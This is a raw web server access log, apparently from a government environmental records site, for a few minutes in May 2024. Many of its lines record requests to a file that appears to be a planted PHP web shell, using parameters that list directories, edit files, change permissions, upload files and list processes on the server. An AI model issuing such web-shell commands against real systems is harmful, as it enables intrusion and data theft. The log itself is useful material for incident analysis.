47.128.127.27 - - [21/May/2024:00:54:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.127.27 - - [21/May/2024:00:54:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=arrow_ltr HTTP/1.1" 200 88
47.128.127.27 - - [21/May/2024:00:54:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_xml HTTP/1.1" 200 231
216.244.66.195 - - [21/May/2024:00:54:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1030.pdf HTTP/1.1" 200 208573
47.128.33.207 - - [21/May/2024:00:54:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=ls&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cimg%5C&sort=3a HTTP/1.1" 200 4299
47.128.33.207 - - [21/May/2024:00:54:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_db HTTP/1.1" 200 1034
47.128.33.207 - - [21/May/2024:00:54:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_jpg HTTP/1.1" 200 175
47.128.33.207 - - [21/May/2024:00:54:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_png HTTP/1.1" 200 175
47.128.33.207 - - [21/May/2024:00:54:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=arrow_ltr HTTP/1.1" 200 88
47.128.33.207 - - [21/May/2024:00:54:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
216.244.66.195 - - [21/May/2024:00:54:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1574.pdf HTTP/1.1" 200 110069
181.53.14.143 - - [21/May/2024:00:55:04 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 304 -
181.53.14.143 - - [21/May/2024:00:55:04 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.14.143 - - [21/May/2024:00:55:04 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [21/May/2024:00:55:04 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 304 -
181.53.14.143 - - [21/May/2024:00:55:04 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 304 -
181.53.14.143 - - [21/May/2024:00:55:04 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [21/May/2024:00:55:04 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 304 -
181.53.14.143 - - [21/May/2024:00:55:04 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [21/May/2024:00:55:04 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [21/May/2024:00:55:04 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [21/May/2024:00:55:04 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [21/May/2024:00:55:05 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 304 -
181.53.14.143 - - [21/May/2024:00:55:05 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 304 -
181.53.14.143 - - [21/May/2024:00:55:05 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
181.53.14.143 - - [21/May/2024:00:55:06 -0500] "GET /sipse/faces/faces/index.xhtml HTTP/1.1" 200 677
181.53.14.143 - - [21/May/2024:00:55:06 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.14.143 - - [21/May/2024:00:55:06 -0500] "GET /sipse/faces/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12409
181.53.14.143 - - [21/May/2024:00:55:06 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.14.143 - - [21/May/2024:00:55:06 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [21/May/2024:00:55:06 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [21/May/2024:00:55:06 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [21/May/2024:00:55:06 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [21/May/2024:00:55:06 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [21/May/2024:00:55:06 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
47.128.31.143 - - [21/May/2024:00:55:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Ccirculares&f=. HTTP/1.1" 200 2862
172.22.2.4 - - [21/May/2024:00:55:12 -0500] "GET /BLA/boletinlegal/jurisprudencia/?C=N;O=D HTTP/1.1" 200 543
216.244.66.195 - - [21/May/2024:00:55:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/0063.pdf HTTP/1.1" 200 517416
201.245.192.253 - - [21/May/2024:00:55:18 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [21/May/2024:00:55:21 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
47.128.31.120 - - [21/May/2024:00:55:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cxampp%5Cxampp%5Cwebalizer%5C&f=daily_usage_201202.png HTTP/1.1" 200 14995
47.128.31.120 - - [21/May/2024:00:55:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.31.120 - - [21/May/2024:00:55:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_png HTTP/1.1" 200 175
47.128.31.120 - - [21/May/2024:00:55:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.31.120 - - [21/May/2024:00:55:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.31.120 - - [21/May/2024:00:55:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.31.120 - - [21/May/2024:00:55:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.31.120 - - [21/May/2024:00:55:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.31.120 - - [21/May/2024:00:55:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.31.120 - - [21/May/2024:00:55:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.31.120 - - [21/May/2024:00:55:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
201.245.192.253 - - [21/May/2024:00:55:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 35554
216.244.66.195 - - [21/May/2024:00:55:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/0265.pdf HTTP/1.1" 200 429427
47.128.117.211 - - [21/May/2024:00:55:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos&f=agua.mp4 HTTP/1.1" 200 2857
216.244.66.195 - - [21/May/2024:00:55:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/0344.pdf HTTP/1.1" 200 499640
47.128.45.101 - - [21/May/2024:00:55:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006++3001-3054&f=00003036.tif HTTP/1.1" 200 2948
172.22.2.4 - - [21/May/2024:00:54:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [21/May/2024:00:55:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/0560.pdf HTTP/1.1" 200 94091
3.141.30.1 - - [21/May/2024:00:55:53 -0500] "GET /robots.txt HTTP/1.1" 404 1018
3.141.30.1 - - [21/May/2024:00:55:53 -0500] "GET /Publicaciones/2024EE96747.pdf HTTP/1.1" 404 227
47.128.34.116 - - [21/May/2024:00:55:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=feedback&d=C%3A%5CUsers%5CAdministrator%5CDesktop%5CCertificate%5C HTTP/1.1" 200 2938
216.244.66.195 - - [21/May/2024:00:55:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/0752.pdf HTTP/1.1" 200 437179
216.244.66.195 - - [21/May/2024:00:56:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/1118.pdf HTTP/1.1" 200 110340
47.128.111.91 - - [21/May/2024:00:56:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Chuelladecarbono&f=._.DS_Store&ft=info HTTP/1.1" 200 3544
47.128.111.91 - - [21/May/2024:00:56:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.111.91 - - [21/May/2024:00:56:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.111.91 - - [21/May/2024:00:56:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.111.91 - - [21/May/2024:00:56:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.111.91 - - [21/May/2024:00:56:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.111.91 - - [21/May/2024:00:56:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.111.91 - - [21/May/2024:00:56:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.111.91 - - [21/May/2024:00:56:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.111.91 - - [21/May/2024:00:56:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.111.91 - - [21/May/2024:00:56:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ds_store HTTP/1.1" 200 1034
216.244.66.195 - - [21/May/2024:00:56:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/1292.pdf HTTP/1.1" 200 124988
201.245.192.253 - - [21/May/2024:00:56:18 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [21/May/2024:00:56:18 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d66826510794084087a689b1c31a1f3ad8.e3iSbxaKaheRe34Nb3yMbhiSbxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
156.59.198.136 - - [21/May/2024:00:56:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=Dise%F1o+de+Elementos+MEA30.pdf HTTP/1.0" 200 2753
47.128.43.118 - - [21/May/2024:00:56:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=ls&d=E%3A%5Cnuevo%5Chtdocs%5CAnexos+estudio+Organizacional+SDA%5CANEXO+No.+8+-+MATRICES+DE+REGISTRO+Y+DE+SALIDA+MEDICI%D3N+CARGAS+LABORALES+SDA%5C1.1+Oficina+de+Control+Int&sort=1a HTTP/1.1" 200 3598
47.128.43.118 - - [21/May/2024:00:56:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=arrow_ltr HTTP/1.1" 200 88
66.249.66.21 - - [21/May/2024:00:56:37 -0500] "GET /Publicaciones/2024EE95043.pdf HTTP/1.1" 404 227
47.128.43.118 - - [21/May/2024:00:56:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_xls HTTP/1.1" 200 1034
201.245.192.253 - - [21/May/2024:00:56:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62840b3333a9e4d5b98f0d30ba0d9434a.e3iSbxaKaheRe34Nb3yMbhiSbxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [21/May/2024:00:54:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 50303
47.128.29.228 - - [21/May/2024:00:56:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ctextiles%5Cimages%5C&f=page12.swf HTTP/1.1" 200 2891
216.245.221.92 - - [21/May/2024:00:56:53 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [21/May/2024:00:55:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52783
47.128.29.204 - - [21/May/2024:00:57:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5Cjs%5C&f=wp-emoji-loader.min.js&ft=edit&white=1 HTTP/1.1" 200 3683
47.128.29.204 - - [21/May/2024:00:57:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_js HTTP/1.1" 200 131
47.128.29.204 - - [21/May/2024:00:57:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.29.204 - - [21/May/2024:00:57:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.29.204 - - [21/May/2024:00:57:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.29.204 - - [21/May/2024:00:57:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.29.204 - - [21/May/2024:00:57:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.29.204 - - [21/May/2024:00:57:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.29.204 - - [21/May/2024:00:57:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.29.204 - - [21/May/2024:00:57:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.29.204 - - [21/May/2024:00:57:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
3.142.124.224 - - [21/May/2024:00:57:00 -0500] "GET /Publicaciones/2024EE98898.pdf HTTP/1.1" 200 1812668
172.22.2.4 - - [21/May/2024:00:57:03 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
47.128.60.58 - - [21/May/2024:00:57:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cboletinlegal&f=consulta.php&ft=edit HTTP/1.1" 200 3747
47.128.60.58 - - [21/May/2024:00:57:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.60.58 - - [21/May/2024:00:57:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_php HTTP/1.1" 200 79
47.128.60.58 - - [21/May/2024:00:57:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.60.58 - - [21/May/2024:00:57:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.60.58 - - [21/May/2024:00:57:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.60.58 - - [21/May/2024:00:57:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.60.58 - - [21/May/2024:00:57:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.60.58 - - [21/May/2024:00:57:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.60.58 - - [21/May/2024:00:57:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.60.58 - - [21/May/2024:00:57:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
201.245.192.253 - - [21/May/2024:00:57:18 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
156.59.198.135 - - [21/May/2024:00:57:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=2&f=1785.pdf HTTP/1.0" 200 3035
47.128.23.129 - - [21/May/2024:00:57:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=ls&d=E%3A%5Cxampp%5Cxampp%5Chtdocs%5CPruebasSTORM%5CPruebas&sort=1a HTTP/1.1" 200 3291
47.128.23.129 - - [21/May/2024:00:57:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=arrow_ltr HTTP/1.1" 200 88
47.128.35.16 - - [21/May/2024:00:57:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Creq%5Cclass%5C&f=paises.php&white=1 HTTP/1.1" 200 508
47.128.124.183 - - [21/May/2024:00:58:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=search&d=E%3A%5Cxampp%5Cxampp%5Chtdocs%5Cphpscripts%5Cinf6%5C HTTP/1.1" 200 2882
201.245.192.253 - - [21/May/2024:00:58:18 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [21/May/2024:00:58:18 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d66826510794084087a689b1c31a1f3ad8.e3iSbxaKaheRe34Nb3yMbhiSbxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.47.13 - - [21/May/2024:00:58:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=upload&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+951-1000%5C HTTP/1.1" 200 2914
47.128.56.68 - - [21/May/2024:00:58:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=ls&d=E%3A%5Cnuevo%5Chtdocs%5CAutoliquidacion%5CCobro+Evaluacion+Certificaci%F3n+Para+La+Deducci%F3n+Por+Inversi%F3n+En+Medio+Ambiente%5C&sort=0d HTTP/1.1" 200 3619
47.128.56.68 - - [21/May/2024:00:58:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.56.68 - - [21/May/2024:00:58:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=arrow_ltr HTTP/1.1" 200 88
47.128.56.68 - - [21/May/2024:00:58:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_pdf HTTP/1.1" 200 1034
201.245.192.253 - - [21/May/2024:00:58:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62840b3333a9e4d5b98f0d30ba0d9434a.e3iSbxaKaheRe34Nb3yMbhiSbxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.124.19 - - [21/May/2024:00:58:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Chtdocs%5CPOT-2013%5Cmemoria+justificativa&f=. HTTP/1.1" 200 2887
172.22.2.4 - - [21/May/2024:00:58:53 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1018
47.128.110.66 - - [21/May/2024:00:58:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=processes&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2022%5C&processes_sort=0a HTTP/1.1" 200 3724
47.128.113.164 - - [21/May/2024:00:59:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes%5C&f=ms-default-filters.php HTTP/1.1" 200 4704
47.128.113.164 - - [21/May/2024:00:59:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.113.164 - - [21/May/2024:00:59:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.113.164 - - [21/May/2024:00:59:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_php HTTP/1.1" 200 79
47.128.113.164 - - [21/May/2024:00:59:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.113.164 - - [21/May/2024:00:59:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.113.164 - - [21/May/2024:00:59:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.113.164 - - [21/May/2024:00:59:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.113.164 - - [21/May/2024:00:59:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.113.164 - - [21/May/2024:00:59:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.113.164 - - [21/May/2024:00:59:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
201.245.192.253 - - [21/May/2024:00:59:18 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.117.58 - - [21/May/2024:00:59:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1750.pdf HTTP/1.1" 200 3033
47.128.117.58 - - [21/May/2024:00:59:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.117.58 - - [21/May/2024:00:59:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_pdf HTTP/1.1" 200 1034
47.128.117.58 - - [21/May/2024:00:59:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.117.58 - - [21/May/2024:00:59:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.117.58 - - [21/May/2024:00:59:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.117.58 - - [21/May/2024:00:59:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.117.58 - - [21/May/2024:00:59:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.117.58 - - [21/May/2024:00:59:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.117.58 - - [21/May/2024:00:59:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.117.58 - - [21/May/2024:00:59:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.97.215 - - [21/May/2024:00:59:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cxampp%5Cxampp%5Chtdocs%5CAnexos+estudio+Organizacional+SDA%5CANEXO+No.+4+-+ENCUESTA+DE+AN%C1LISIS+ORGANIZACIONAL&f=. HTTP/1.1" 200 2973
156.59.198.135 - - [21/May/2024:00:59:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=2&f=5272.pdf HTTP/1.0" 200 3033
47.128.60.196 - - [21/May/2024:01:00:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Chuelladecarbono&f=descargas.html&ft=edit HTTP/1.1" 200 4749
47.128.60.196 - - [21/May/2024:01:00:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.60.196 - - [21/May/2024:01:00:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.60.196 - - [21/May/2024:01:00:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.60.196 - - [21/May/2024:01:00:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.60.196 - - [21/May/2024:01:00:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.60.196 - - [21/May/2024:01:00:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.60.196 - - [21/May/2024:01:00:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.60.196 - - [21/May/2024:01:00:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.60.196 - - [21/May/2024:01:00:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.114.121 - - [21/May/2024:01:00:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cmetalmecanica%5Cimages%5C&f=page76.swf HTTP/1.1" 200 3031
47.128.114.121 - - [21/May/2024:01:00:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.114.121 - - [21/May/2024:01:00:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.114.121 - - [21/May/2024:01:00:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.114.121 - - [21/May/2024:01:00:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.114.121 - - [21/May/2024:01:00:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.114.121 - - [21/May/2024:01:00:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.114.121 - - [21/May/2024:01:00:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.114.121 - - [21/May/2024:01:00:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
